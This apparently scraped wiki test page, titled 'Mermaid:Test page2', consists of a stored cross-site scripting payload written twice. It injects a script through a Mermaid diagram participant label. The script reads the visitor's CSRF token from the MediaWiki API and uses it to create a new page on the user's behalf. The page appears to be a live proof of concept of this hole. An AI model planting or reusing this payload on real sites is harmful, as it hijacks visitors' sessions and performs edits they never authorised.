Mermaid:Test page2
From Cheeky Factor
sequenceDiagram
participant Alice <u>test</u><script>
x=new XMLHttpRequest();
page_title = "XSS_Page_"+(new Date().getTime());
x.onload=function(){
console.log(this.responseText);
resp = JSON.parse(this.responseText);
csrf_token = resp['query']['tokens']['csrftoken'];
console.log("CSRF Token: ", csrf_token);
// now make a request on behalf of the user
x2 = new XMLHttpRequest();
x2.onload=function(){
console.log(this.responseText);
console.log("Visit the new page at https://cheekyfactor.com/index.php/"+page_title);
};
x2.open("POST", "https://cheekyfactor.com/api.php");
x2.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
x2.send("action=edit&format=jsonfm&wrappedhtml=1&title="+page_title+"&text=a%20new%20page%20via%20API&token="+encodeURIComponent(csrf_token));
};
x.open("POST","https://cheekyfactor.com/api.php?action=query&format=json&meta=tokens&type=csrf");
x.send();
</script>
sequenceDiagram
participant Alice <u>test</u><script>
x=new XMLHttpRequest();
page_title = "XSS_Page_"+(new Date().getTime());
x.onload=function(){
console.log(this.responseText);
resp = JSON.parse(this.responseText);
csrf_token = resp['query']['tokens']['csrftoken'];
console.log("CSRF Token: ", csrf_token);
// now make a request on behalf of the user
x2 = new XMLHttpRequest();
x2.onload=function(){
console.log(this.responseText);
console.log("Visit the new page at https://cheekyfactor.com/index.php/"+page_title);
};
x2.open("POST", "https://cheekyfactor.com/api.php");
x2.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
x2.send("action=edit&format=jsonfm&wrappedhtml=1&title="+page_title+"&text=a%20new%20page%20via%20API&token="+encodeURIComponent(csrf_token));
};
x.open("POST","https://cheekyfactor.com/api.php?action=query&format=json&meta=tokens&type=csrf");
x.send();
</script>
